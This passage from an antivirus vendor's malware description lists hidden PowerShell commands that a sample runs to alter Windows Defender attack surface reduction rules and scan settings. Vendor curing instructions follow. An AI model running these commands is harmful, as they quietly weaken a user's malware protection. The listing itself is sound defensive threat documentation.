  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d1e49aac-8f56-4280-b9ba-993a6d77406c -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanParameters 1

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android